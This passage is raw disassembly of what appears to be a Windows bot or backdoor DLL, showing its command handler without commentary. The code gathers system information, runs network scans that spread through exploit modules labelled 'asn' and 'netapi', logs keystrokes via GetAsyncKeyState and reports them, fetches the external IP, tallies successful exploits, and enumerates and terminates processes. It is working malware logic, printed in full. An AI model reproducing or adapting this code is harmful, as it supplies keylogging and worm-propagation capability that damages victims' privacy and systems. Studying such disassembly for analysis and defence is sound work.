test eax, eax
jnz short loc_10008E49
push 0Ah ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_10008E30
; ---------------------------------------------------------------------------
loc_10008E49: ; CODE XREF: sub_10007424+1A19�j
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_10008E4E: ; CODE XREF: sub_10007424+190A�j
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+Dst]
push edx ; Str2
push offset aUinfo ; "uinfo"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz loc_100090B2
mov [ebp+lpBuffer], offset aPc ; "PC"
mov [ebp+nSize], 100h
mov [ebp+var_250C], 0
call ds:GetTickCount ; GetTickCount
push eax ; Seed
call ds:srand ; srand
add esp, 4
lea eax, [ebp+nSize]
push eax ; nSize
mov ecx, [ebp+lpBuffer]
push ecx ; lpBuffer
call ds:GetComputerNameA ; GetComputerNameA
test eax, eax
jnz short loc_10008EBF
mov [ebp+lpBuffer], offset aPc_0 ; "PC"
loc_10008EBF: ; CODE XREF: sub_10007424+1A8F�j
mov [ebp+var_2508], 41h
jmp short loc_10008EDA
; ---------------------------------------------------------------------------
loc_10008ECB: ; CODE XREF: sub_10007424:loc_10008EFE�j
mov edx, [ebp+var_2508]
add edx, 1
mov [ebp+var_2508], edx
loc_10008EDA: ; CODE XREF: sub_10007424+1AA5�j
cmp [ebp+var_2508], 5Bh
jge short loc_10008F00
mov eax, [ebp+lpBuffer]
movsx ecx, byte ptr [eax]
cmp ecx, [ebp+var_2508]
jnz short loc_10008EFE
mov [ebp+var_250C], 1
loc_10008EFE: ; CODE XREF: sub_10007424+1ACE�j
jmp short loc_10008ECB
; ---------------------------------------------------------------------------
loc_10008F00: ; CODE XREF: sub_10007424+1ABD�j
mov [ebp+var_2508], 61h
jmp short loc_10008F1B
; ---------------------------------------------------------------------------
loc_10008F0C: ; CODE XREF: sub_10007424:loc_10008F3F�j
mov edx, [ebp+var_2508]
add edx, 1
mov [ebp+var_2508], edx
loc_10008F1B: ; CODE XREF: sub_10007424+1AE6�j
cmp [ebp+var_2508], 7Bh
jge short loc_10008F41
mov eax, [ebp+lpBuffer]
movsx ecx, byte ptr [eax]
cmp ecx, [ebp+var_2508]
jnz short loc_10008F3F
mov [ebp+var_250C], 1
loc_10008F3F: ; CODE XREF: sub_10007424+1B0F�j
jmp short loc_10008F0C
; ---------------------------------------------------------------------------
loc_10008F41: ; CODE XREF: sub_10007424+1AFE�j
cmp [ebp+var_250C], 0
jnz short loc_10008F54
mov [ebp+lpBuffer], offset aPc_1 ; "PC"
loc_10008F54: ; CODE XREF: sub_10007424+1B24�j
mov [ebp+var_24F0], offset dword_1002D130
mov [ebp+VersionInformation.dwOSVersionInfoSize], 94h
lea edx, [ebp+VersionInformation]
push edx ; lpVersionInformation
call ds:GetVersionExA ; GetVersionExA
call ds:GetTickCount ; GetTickCount
push eax ; Seed
call ds:srand ; srand
add esp, 4
cmp [ebp+VersionInformation.dwMajorVersion], 4
jnz short loc_10008FC2
cmp [ebp+VersionInformation.dwMinorVersion], 0
jnz short loc_10008FC2
cmp [ebp+VersionInformation.dwPlatformId], 1
jnz short loc_10008FAA
mov [ebp+var_24F0], offset aWindows95 ; "WINDOWS 95"
loc_10008FAA: ; CODE XREF: sub_10007424+1B7A�j
cmp [ebp+VersionInformation.dwPlatformId], 2
jnz short loc_10008FBD
mov [ebp+var_24F0], offset aWindowsNt ; "WINDOWS NT"
loc_10008FBD: ; CODE XREF: sub_10007424+1B8D�j
jmp loc_10009065
; ---------------------------------------------------------------------------
loc_10008FC2: ; CODE XREF: sub_10007424+1B68�j
; sub_10007424+1B71�j
cmp [ebp+VersionInformation.dwMajorVersion], 4
jnz short loc_10008FE3
cmp [ebp+VersionInformation.dwMinorVersion], 0Ah
jnz short loc_10008FE3
mov [ebp+var_24F0], offset aWindows98 ; "WINDOWS 98"
jmp loc_10009065
; ---------------------------------------------------------------------------
loc_10008FE3: ; CODE XREF: sub_10007424+1BA5�j
; sub_10007424+1BAE�j
cmp [ebp+VersionInformation.dwMajorVersion], 4
jnz short loc_10009001
cmp [ebp+VersionInformation.dwMinorVersion], 5Ah
jnz short loc_10009001
mov [ebp+var_24F0], offset aWindowsMe ; "WINDOWS ME"
jmp short loc_10009065
; ---------------------------------------------------------------------------
loc_10009001: ; CODE XREF: sub_10007424+1BC6�j
; sub_10007424+1BCF�j
cmp [ebp+VersionInformation.dwMajorVersion], 5
jnz short loc_1000901F
cmp [ebp+VersionInformation.dwMinorVersion], 0
jnz short loc_1000901F
mov [ebp+var_24F0], offset aWindows2k ; "WINDOWS 2K"
jmp short loc_10009065
; ---------------------------------------------------------------------------
loc_1000901F: ; CODE XREF: sub_10007424+1BE4�j
; sub_10007424+1BED�j
cmp [ebp+VersionInformation.dwMajorVersion], 5
jnz short loc_1000903D
cmp [ebp+VersionInformation.dwMinorVersion], 1
jnz short loc_1000903D
mov [ebp+var_24F0], offset aWindowsXp ; "WINDOWS XP"
jmp short loc_10009065
; ---------------------------------------------------------------------------
loc_1000903D: ; CODE XREF: sub_10007424+1C02�j
; sub_10007424+1C0B�j
cmp [ebp+VersionInformation.dwMajorVersion], 5
jnz short loc_1000905B
cmp [ebp+VersionInformation.dwMinorVersion], 2
jnz short loc_1000905B
mov [ebp+var_24F0], offset aWindows2k3 ; "WINDOWS 2K3"
jmp short loc_10009065
; ---------------------------------------------------------------------------
loc_1000905B: ; CODE XREF: sub_10007424+1C20�j
; sub_10007424+1C29�j
mov [ebp+var_24F0], offset aUnknown ; "UNKNOWN"
loc_10009065: ; CODE XREF: sub_10007424:loc_10008FBD�j
; sub_10007424+1BBA�j ...
call ds:GetTickCount ; GetTickCount
push eax ; Seed
call ds:srand ; srand
add esp, 4
push 0Ah ; cchData
lea eax, [ebp+LCData]
push eax ; lpLCData
push 7 ; LCType
push 800h ; Locale
call ds:GetLocaleInfoA ; GetLocaleInfoA
mov ecx, [ebp+var_24F0]
push ecx
lea edx, [ebp+LCData]
push edx ; char
push offset aUserinfoCountr ; "{USERINFO}: Country %s operating system"...
lea eax, [ebp+Dest]
push eax ; int
call sub_10007303
add esp, 10h
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_100090B2: ; CODE XREF: sub_10007424+1A45�j
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+Dst]
push edx ; Str2
push offset aScan ; "scan"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz loc_1000955B
mov eax, [ebp+var_1D4]
cmp [ebp+eax*4+Source], 0
jnz short loc_100090E5
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_100090E5: ; CODE XREF: sub_10007424+1CBA�j
xor ecx, ecx
mov cl, byte_1002D0F6
test ecx, ecx
jz short loc_100090F6
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_100090F6: ; CODE XREF: sub_10007424+1CCB�j
mov byte_1002D0F6, 1
mov edx, [ebp+var_1D4]
mov eax, [ebp+edx*4+Str2]
push eax ; Str2
push offset aAsn ; "asn"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz loc_100091B4
mov word ptr [ebp+var_2604], 8Bh
mov word ptr [ebp+var_2604+2], 0
mov [ebp+var_2600], 0
push 40h ; Count
push offset aAsn_0 ; "asn"
lea ecx, [ebp+var_25FE]
push ecx ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
lea edx, [ebp+var_261C]
push edx
lea eax, [ebp+var_2618]
push eax
lea ecx, [ebp+var_2614]
push ecx
lea edx, [ebp+var_2610]
push edx
push offset aD_D_D_D_1 ; "%d.%d.%d.%d"
push offset Dest ; Src
call ds:sscanf ; sscanf
add esp, 18h
mov eax, [ebp+var_2614]
push eax
mov ecx, dword ptr [ebp+var_2610]
push ecx
mov edx, dword ptr [ebp+var_2610]
push edx ; char
push offset aScanningD_x_x_ ; "{SCANNING}: %d.x.x.x - %d.%d.x.x..."
lea eax, [ebp+Dest]
push eax ; int
call sub_10007303
add esp, 14h
mov byte_1002D0F6, 1
jmp loc_100092D8
; ---------------------------------------------------------------------------
loc_100091B4: ; CODE XREF: sub_10007424+1CF4�j
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+Str2]
push edx ; Str2
push offset aNetapi ; "netapi"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz loc_10009268
mov word ptr [ebp+var_2604], 8Bh
mov word ptr [ebp+var_2604+2], 0
mov [ebp+var_2600], 0
push 40h ; Count
push offset aNetapi_0 ; "netapi"
lea eax, [ebp+var_25FE]
push eax ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
lea ecx, [ebp+var_261C]
push ecx
lea edx, [ebp+var_2618]
push edx
lea eax, [ebp+var_2614]
push eax
lea ecx, [ebp+var_2610]
push ecx
push offset aD_D_D_D_2 ; "%d.%d.%d.%d"
push offset Dest ; Src
call ds:sscanf ; sscanf
add esp, 18h
mov edx, [ebp+var_2614]
push edx
mov eax, dword ptr [ebp+var_2610]
push eax
mov ecx, dword ptr [ebp+var_2610]
push ecx ; char
push offset aScanningD_x__0 ; "{SCANNING}: %d.x.x.x - %d.%d.x.x..."
lea edx, [ebp+Dest]
push edx ; int
call sub_10007303
add esp, 14h
mov byte_1002D0F6, 1
jmp short loc_100092D8
; ---------------------------------------------------------------------------
loc_10009268: ; CODE XREF: sub_10007424+1DAB�j
mov eax, [ebp+var_1D4]
mov ecx, [ebp+eax*4+Str2]
push ecx ; Str
call ds:atoi ; atoi
add esp, 4
mov word ptr [ebp+var_2604], ax
mov edx, [ebp+var_2604]
and edx, 0FFFFh
test edx, edx
jnz short loc_100092B3
push offset aScanningFailed ; "{SCANNING}: Failed..."
lea eax, [ebp+Dest]
push eax ; int
call sub_10007303
add esp, 8
mov byte_1002D0F6, 0
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_100092B3: ; CODE XREF: sub_10007424+1E6D�j
mov word ptr [ebp+var_2604+2], 0
mov [ebp+var_2600], 0
push 40h ; Size
push 0 ; Val
lea ecx, [ebp+var_25FE]
push ecx ; Dst
call memset ; memset
add esp, 0Ch
loc_100092D8: ; CODE XREF: sub_10007424+1D8B�j
; sub_10007424+1E42�j
mov edx, [ebp+var_1D4]
mov eax, [ebp+edx*4+Source]
push eax ; Str
call ds:atoi ; atoi
add esp, 4
mov [ebp+var_25A4], eax
mov ecx, [ebp+var_25A4]
mov [ebp+var_2B58], ecx
cmp [ebp+var_2B58], 1
jz short loc_1000931B
cmp [ebp+var_2B58], 2
jz short loc_10009356
cmp [ebp+var_2B58], 3
jz short loc_10009362
jmp short loc_1000936C
; ---------------------------------------------------------------------------
loc_1000931B: ; CODE XREF: sub_10007424+1EE1�j
mov [ebp+var_2608], 64h
lea edx, [ebp+var_261C]
push edx
lea eax, [ebp+var_2618]
push eax
lea ecx, [ebp+var_2614]
push ecx
lea edx, [ebp+var_2610]
push edx
push offset aD_D_D_D_3 ; "%d.%d.%d.%d"
push offset Dest ; Src
call ds:sscanf ; sscanf
add esp, 18h
jmp short loc_1000936C
; ---------------------------------------------------------------------------
loc_10009356: ; CODE XREF: sub_10007424+1EEA�j
mov [ebp+var_2608], 32h
jmp short loc_1000936C
; ---------------------------------------------------------------------------
loc_10009362: ; CODE XREF: sub_10007424+1EF3�j
mov [ebp+var_2608], 14h
loc_1000936C: ; CODE XREF: sub_10007424+1EF5�j
; sub_10007424+1F30�j ...
mov eax, [ebp+var_1D4]
cmp [ebp+eax*4+var_74], 0
jz short loc_1000939B
push 10h ; Count
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+var_74]
push edx ; Source
lea eax, [ebp+var_25BE]
push eax ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
jmp loc_10009496
; ---------------------------------------------------------------------------
loc_1000939B: ; CODE XREF: sub_10007424+1F53�j
lea ecx, [ebp+var_261C]
push ecx
lea edx, [ebp+var_2618]
push edx
lea eax, [ebp+var_2614]
push eax
lea ecx, [ebp+var_2610]
push ecx
push offset aD_D_D_D_4 ; "%d.%d.%d.%d"
push offset Dest ; Src
call ds:sscanf ; sscanf
add esp, 18h
mov edx, [ebp+var_127]
and edx, 0FFh
test edx, edx
jz short loc_100093FD
mov eax, dword ptr [ebp+var_2610]
push eax
push offset aD_x_x_x ; "%d.x.x.x"
push 10h ; Count
lea ecx, [ebp+var_25BE]
push ecx ; Dest
call ds:_snprintf ; _snprintf
add esp, 10h
jmp loc_10009496
; ---------------------------------------------------------------------------
loc_100093FD: ; CODE XREF: sub_10007424+1FB4�j
mov edx, [ebp+var_127+1]
and edx, 0FFh
test edx, edx
jz short loc_10009434
mov eax, [ebp+var_2614]
push eax
mov ecx, dword ptr [ebp+var_2610]
push ecx
push offset aD_D_x_x ; "%d.%d.x.x"
push 10h ; Count
lea edx, [ebp+var_25BE]
push edx ; Dest
call ds:_snprintf ; _snprintf
add esp, 14h
jmp short loc_10009496
; ---------------------------------------------------------------------------
loc_10009434: ; CODE XREF: sub_10007424+1FE7�j
mov eax, [ebp+var_127+2]
and eax, 0FFh
test eax, eax
jz short loc_10009471
mov ecx, [ebp+var_2618]
push ecx
mov edx, [ebp+var_2614]
push edx
mov eax, dword ptr [ebp+var_2610]
push eax
push offset aD_D_D_x ; "%d.%d.%d.x"
push 10h ; Count
lea ecx, [ebp+var_25BE]
push ecx ; Dest
call ds:_snprintf ; _snprintf
add esp, 18h
jmp short loc_10009496
; ---------------------------------------------------------------------------
loc_10009471: ; CODE XREF: sub_10007424+201D�j
mov edx, [ebp+var_2614]
push edx
mov eax, dword ptr [ebp+var_2610]
push eax
push offset aD_D_x_x_0 ; "%d.%d.x.x"
push 10h ; Count
lea ecx, [ebp+var_25BE]
push ecx ; Dest
call ds:_snprintf ; _snprintf
add esp, 14h
loc_10009496: ; CODE XREF: sub_10007424+1F72�j
; sub_10007424+1FD4�j ...
mov dl, [ebp+var_11F]
mov byte_1002D0F5, dl
mov byte ptr [ebp+var_25AD], 0
lea eax, [ebp+var_25BE]
push eax ; int
push offset aScan_0 ; "scan"
call sub_1000A752
add esp, 8
mov [ebp+var_260C], eax
cmp [ebp+var_260C], 0FFFFFFFFh
jnz short loc_100094D8
mov byte_1002D0F6, 0
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_100094D8: ; CODE XREF: sub_10007424+20A6�j
mov ecx, [ebp+var_260C]
imul ecx, 0CCh
mov byte_10012E98[ecx], 1
lea edx, [ebp+var_260C]
push edx
push offset sub_10009EF0
call sub_10004C65
add esp, 8
mov ecx, [ebp+var_260C]
imul ecx, 0CCh
mov dword_10012EA0[ecx], eax
mov edx, [ebp+var_260C]
imul edx, 0CCh
cmp dword_10012EA0[edx], 0
jnz short loc_1000953C
push 1
mov eax, [ebp+var_260C]
push eax
call sub_1000AB26
add esp, 8
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_1000953C: ; CODE XREF: sub_10007424+2100�j
; sub_10007424+2130�j
mov ecx, [ebp+var_25AD]
and ecx, 0FFh
test ecx, ecx
jnz short loc_10009556
push 0Ah ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_1000953C
; ---------------------------------------------------------------------------
loc_10009556: ; CODE XREF: sub_10007424+2126�j
jmp loc_1000982A
; ---------------------------------------------------------------------------
loc_1000955B: ; CODE XREF: sub_10007424+1CA9�j
mov edx, [ebp+var_1D4]
mov eax, [ebp+edx*4+Dst]
push eax ; Str2
push offset aKeylog ; "keylog"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz loc_1000982A
loc_1000957C: ; CODE XREF: sub_10007424:loc_10009825�j
mov ecx, 1
test ecx, ecx
jz loc_1000982A
mov [ebp+uCode], 0
jmp short loc_100095A4
; ---------------------------------------------------------------------------
loc_10009595: ; CODE XREF: sub_10007424:loc_1000963B�j
mov edx, [ebp+uCode]
add edx, 1
mov [ebp+uCode], edx
loc_100095A4: ; CODE XREF: sub_10007424+216F�j
cmp [ebp+uCode], 100h
jge loc_10009640
mov eax, [ebp+uCode]
push eax ; vKey
call ds:GetAsyncKeyState ; GetAsyncKeyState
movsx ecx, ax
cmp ecx, 0FFFF8001h
jnz short loc_1000963B
push 0 ; idThread
call ds:GetKeyboardLayout ; GetKeyboardLayout
push eax ; dwhkl
push 0 ; uMapType
mov edx, [ebp+uCode]
push edx ; uCode
call ds:MapVirtualKeyExA ; MapVirtualKeyExA
mov [ebp+var_2620], eax
push 104h ; cchSize
lea eax, [ebp+String]
push eax ; lpString
mov ecx, [ebp+var_2620]
shl ecx, 10h
push ecx ; lParam
call ds:GetKeyNameTextA ; GetKeyNameTextA
lea edx, [ebp+String]
push edx ; Str
call strlen ; strlen
add esp, 4
test eax, eax
jbe short loc_1000963B
lea eax, [ebp+String]
push eax
push offset asc_100127A0 ; "\r\n"
push offset aKeylogS ; "{KEYLOG}:%s\r\n"
lea ecx, [ebp+Dest]
push ecx ; int
call sub_10007303
add esp, 10h
jmp short loc_10009640
; ---------------------------------------------------------------------------
loc_1000963B: ; CODE XREF: sub_10007424+21A6�j
; sub_10007424+21F3�j
jmp loc_10009595
; ---------------------------------------------------------------------------
loc_10009640: ; CODE XREF: sub_10007424+218A�j
; sub_10007424+2215�j
mov edx, [ebp+var_1D4]
mov eax, [ebp+edx*4+Dst]
push eax ; Str2
push offset aScanstop ; "scanstop"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz short loc_1000968A
push offset aScan_1 ; "scan"
call sub_1000A8D0
add esp, 4
mov ecx, dword_1002D0EC
push ecx ; char
push offset aScanstopStoppe ; "{SCANSTOP}: Stopped scanning... :%d: Ro"...
lea edx, [ebp+Dest]
push edx ; int
call sub_10007303
add esp, 0Ch
jmp loc_10009825
; ---------------------------------------------------------------------------
loc_1000968A: ; CODE XREF: sub_10007424+2237�j
mov eax, [ebp+var_1D4]
mov ecx, [ebp+eax*4+Dst]
push ecx ; Str2
push offset aEip ; "!eip"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz loc_100097C5
mov [ebp+NumberOfBytesRead], 0
mov [ebp+var_2B48], 0
xor edx, edx
mov [ebp+var_2B47], edx
mov [ebp+var_2B43], edx
mov [ebp+var_2B3F], edx
mov [ebp+var_2B3B], dx
mov [ebp+var_2B39], dl
mov [ebp+PathName], 0
mov ecx, 40h
xor eax, eax
lea edi, [ebp+var_2A2B]
rep stosd
stosw
stosb
mov [ebp+TempFileName], 0
mov ecx, 40h
xor eax, eax
lea edi, [ebp+var_2B37]
rep stosd
stosw
stosb
mov [ebp+var_2928], 0
mov ecx, 7Fh
xor eax, eax
lea edi, [ebp+var_2927]
rep stosd
stosw
stosb
lea eax, [ebp+PathName]
push eax ; lpBuffer
push 103h ; nBufferLength
call ds:GetTempPathA ; GetTempPathA
lea ecx, [ebp+TempFileName]
push ecx ; lpTempFileName
push 0 ; uUnique
push offset PrefixString ; "Temp"
lea edx, [ebp+PathName]
push edx ; lpPathName
call ds:GetTempFileNameA ; GetTempFileNameA
xor eax, eax
test eax, eax
jz short loc_100097C3
push 0 ; hTemplateFile
push 80h ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 1 ; dwShareMode
push 80000000h ; dwDesiredAccess
lea ecx, [ebp+TempFileName]
push ecx ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hFile], eax
cmp [ebp+hFile], 0FFFFFFFFh
jz short loc_100097C3
push 0 ; lpOverlapped
lea edx, [ebp+NumberOfBytesRead]
push edx ; lpNumberOfBytesRead
push 0Fh ; nNumberOfBytesToRead
lea eax, [ebp+var_2B48]
push eax ; lpBuffer
mov ecx, [ebp+hFile]
push ecx ; hFile
call ds:ReadFile ; ReadFile
lea edx, [ebp+var_2B48]
push edx ; char
push offset aExternalIpS___ ; "{EXTERNAL-IP} %s..."
lea eax, [ebp+Dest]
push eax ; int
call sub_10007303
add esp, 0Ch
loc_100097C3: ; CODE XREF: sub_10007424+2335�j
; sub_10007424+2363�j
jmp short loc_10009825
; ---------------------------------------------------------------------------
loc_100097C5: ; CODE XREF: sub_10007424+2281�j
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+Dst]
push edx ; Str2
push offset aScanstats ; "scanstats"
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz short loc_10009825
mov eax, [ebp+var_1D4]
cmp [ebp+eax*4+Str2], 0
jz short loc_1000980B
mov ecx, [ebp+var_1D4]
mov edx, [ebp+ecx*4+Str2]
push edx ; Str
call ds:atoi ; atoi
add esp, 4
cmp dword_1002D0EC, eax
jl short loc_10009825
loc_1000980B: ; CODE XREF: sub_10007424+23C9�j
mov eax, dword_1002D0EC
push eax ; char
push offset aScanstatsExplo ; "{SCANSTATS}: Exploits %d..."
lea ecx, [ebp+Dest]
push ecx ; int
call sub_10007303
add esp, 0Ch
loc_10009825: ; CODE XREF: sub_10007424+2261�j
; sub_10007424:loc_100097C3�j ...
jmp loc_1000957C
; ---------------------------------------------------------------------------
loc_1000982A: ; CODE XREF: sub_10007424+124�j
; sub_10007424+156�j ...
pop edi
mov esp, ebp
pop ebp
retn
sub_10007424 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10009830 proc near ; DATA XREF: .data:1000E04C�o
push ebp
mov ebp, esp
call sub_1000983F
call sub_1000984F
pop ebp
retn
sub_10009830 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000983F proc near ; CODE XREF: sub_10009830+3�p
push ebp
mov ebp, esp
mov ecx, offset byte_1002D135
call ds:??0Init@ios_base@std@@QAE@XZ ; std::ios_base::Init::Init(void)
pop ebp
retn
sub_1000983F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000984F proc near ; CODE XREF: sub_10009830+8�p
push ebp
mov ebp, esp
push offset sub_10009861 ; void (__cdecl *)()
call _atexit
add esp, 4
pop ebp
retn
sub_1000984F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __cdecl sub_10009861()
sub_10009861 proc near ; DATA XREF: sub_1000984F+3�o
push ebp
mov ebp, esp
mov ecx, offset byte_1002D135
call ds:??1Init@ios_base@std@@QAE@XZ ; std::ios_base::Init::~Init(void)
pop ebp
retn
sub_10009861 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10009871 proc near ; DATA XREF: .data:1000E050�o
push ebp
mov ebp, esp
call sub_10009880
call sub_10009890
pop ebp
retn
sub_10009871 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10009880 proc near ; CODE XREF: sub_10009871+3�p
push ebp
mov ebp, esp
mov ecx, offset byte_1002D134
call ds:??0_Winit@std@@QAE@XZ ; std::_Winit::_Winit(void)
pop ebp
retn
sub_10009880 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10009890 proc near ; CODE XREF: sub_10009871+8�p
push ebp
mov ebp, esp
push offset sub_100098A2 ; void (__cdecl *)()
call _atexit
add esp, 4
pop ebp
retn
sub_10009890 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __cdecl sub_100098A2()
sub_100098A2 proc near ; DATA XREF: sub_10009890+3�o
push ebp
mov ebp, esp
mov ecx, offset byte_1002D134
call ds:??1_Winit@std@@QAE@XZ ; std::_Winit::~_Winit(void)
pop ebp
retn
sub_100098A2 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 12Ch
push 0
push 2
call CreateToolhelp32Snapshot ; CreateToolhelp32Snapshot
mov [ebp-12Ch], eax
cmp dword ptr [ebp-12Ch], 0FFFFFFFFh
jz short loc_10009943
mov dword ptr [ebp-128h], 128h
lea eax, [ebp-128h]
push eax
mov ecx, [ebp-12Ch]
push ecx
call Process32First ; Process32First
test eax, eax
jz short loc_10009936
loc_100098F4: ; CODE XREF: .text:loc_10009934�j
lea edx, [ebp-128h]
push edx
mov eax, [ebp-12Ch]
push eax
call Process32Next ; Process32Next
test eax, eax
jz short loc_10009936
mov ecx, [ebp+8]
push ecx
lea edx, [ebp-104h]
push edx
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz short loc_10009934
mov eax, [ebp-12Ch]
push eax
call ds:CloseHandle ; CloseHandle
mov al, 1
jmp short loc_10009945
; ---------------------------------------------------------------------------
loc_10009934: ; CODE XREF: .text:10009921�j
jmp short loc_100098F4
; ---------------------------------------------------------------------------
loc_10009936: ; CODE XREF: .text:100098F2�j
; .text:10009909�j
mov ecx, [ebp-12Ch]
push ecx
call ds:CloseHandle ; CloseHandle
loc_10009943: ; CODE XREF: .text:100098D1�j
xor al, al
loc_10009945: ; CODE XREF: .text:10009932�j
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10009949(DWORD dwProcessId)
sub_10009949 proc near ; CODE XREF: sub_10007424+18E2�p
hObject = dword ptr -4
dwProcessId = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+dwProcessId]
push eax ; dwProcessId
push 0 ; bInheritHandle
push 1F0FFFh ; dwDesiredAccess
call ds:OpenProcess ; OpenProcess
mov [ebp+hObject], eax
cmp [ebp+hObject], 0
jz short loc_10009989
push 0 ; uExitCode
mov ecx, [ebp+hObject]
push ecx ; hProcess
call ds:TerminateProcess ; TerminateProcess
test eax, eax
jnz short loc_10009985
mov edx, [ebp+hObject]
push edx ; hObject
call ds:CloseHandle ; CloseHandle
xor al, al
jmp short loc_1000998B
; ---------------------------------------------------------------------------
loc_10009985: ; CODE XREF: sub_10009949+2C�j
mov al, 1
jmp short loc_1000998B
; ---------------------------------------------------------------------------
loc_10009989: ; CODE XREF: sub_10009949+1C�j
xor al, al
loc_1000998B: ; CODE XREF: sub_10009949+3A�j
; sub_10009949+3E�j
mov esp, ebp
pop ebp
retn
sub_10009949 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_1000998F(char *Str2,int)
sub_1000998F proc near ; CODE XREF: sub_10007424+1845�p
; sub_10007424+1891�p
hSnapshot = dword ptr -130h
Str1 = PROCESSENTRY32 ptr -12Ch
hObject = dword ptr -4
Str2 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 130h
push 0 ; th32ProcessID
push 2 ; dwFlags
call CreateToolhelp32Snapshot ; CreateToolhelp32Snapshot
mov [ebp+hSnapshot], eax
cmp [ebp+hSnapshot], 0FFFFFFFFh
jz loc_10009A9C
mov [ebp+Str1.dwSize], 128h
lea eax, [ebp+Str1]
push eax ; lppe
mov ecx, [ebp+hSnapshot]
push ecx ; hSnapshot
call Process32First ; Process32First
test eax, eax
jz loc_10009A8F
loc_100099D9: ; CODE XREF: sub_1000998F:loc_10009A8A�j
lea edx, [ebp+Str1]
push edx ; lppe
mov eax, [ebp+hSnapshot]
push eax ; hSnapshot
call Process32Next ; Process32Next
test eax, eax
jz loc_10009A8F
mov ecx, [ebp+Str2]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_10009A45
mov eax, [ebp+Str2]
push eax ; Str2
lea ecx, [ebp+Str1.szExeFile]
push ecx ; Str1
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz short loc_10009A43
mov edx, [ebp+Str1.th32ProcessID]
push edx ; dwProcessId
push 0 ; bInheritHandle
push 1F0FFFh ; dwDesiredAccess
call ds:OpenProcess ; OpenProcess
mov [ebp+hObject], eax
push 0 ; uExitCode
mov eax, [ebp+hObject]
push eax ; hProcess
call ds:TerminateProcess ; TerminateProcess
mov ecx, [ebp+hObject]
push ecx ; hObject
call ds:CloseHandle ; CloseHandle
loc_10009A43: ; CODE XREF: sub_1000998F+85�j
jmp short loc_10009A8A
; ---------------------------------------------------------------------------
loc_10009A45: ; CODE XREF: sub_1000998F+6D�j
mov edx, [ebp+Str1.th32ProcessID]
push edx ; th32ProcessID
push 2 ; dwFlags
call CreateToolhelp32Snapshot ; CreateToolhelp32Snapshot
mov [ebp+hObject], eax
mov eax, [ebp+Str1.th32ProcessID]
push eax
lea ecx, [ebp+Str1.szExeFile]
push ecx ; char
push offset aSD ; "%s (%d)"
mov edx, [ebp+arg_4]
push edx ; int
call sub_10007303
add esp, 10h
mov eax, [ebp+hObject]
push eax ; hObject
call ds:CloseHandle ; CloseHandle
push 3E8h ; dwMilliseconds
call ds:Sleep ; Sleep
loc_10009A8A: ; CODE XREF: sub_1000998F:loc_10009A43�j
jmp loc_100099D9
; ---------------------------------------------------------------------------
loc_10009A8F: ; CODE XREF: sub_1000998F+44�j
; sub_1000998F+5F�j
mov ecx, [ebp+hSnapshot]
push ecx ; hObject
call ds:CloseHandle ; CloseHandle
loc_10009A9C: ; CODE XREF: sub_1000998F+1F�j
mov esp, ebp
pop ebp
retn
sub_1000998F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10009AA0 proc near ; DATA XREF: .data:1000E054�o
push ebp
mov ebp, esp
call sub_10009AAF
call sub_10009ABF
pop ebp
retn
sub_10009AA0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10009AAF proc near ; CODE XREF: sub_10009AA0+3�p
push ebp
mov ebp, esp
mov ecx, offset byte_1002D13F
call ds:??0Init@ios_base@std@@QAE@XZ ; std::ios_base::Init::Init(void)
pop ebp
retn
sub_10009AAF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10009ABF proc near ; CODE XREF: sub_10009AA0+8�p
push ebp
mov ebp, esp
push offset sub_10009AD1 ; void (__cdecl *)()
call _atexit
add esp, 4
pop ebp
retn
sub_10009ABF endp
; =============== S U B R O U T I N E =======================================
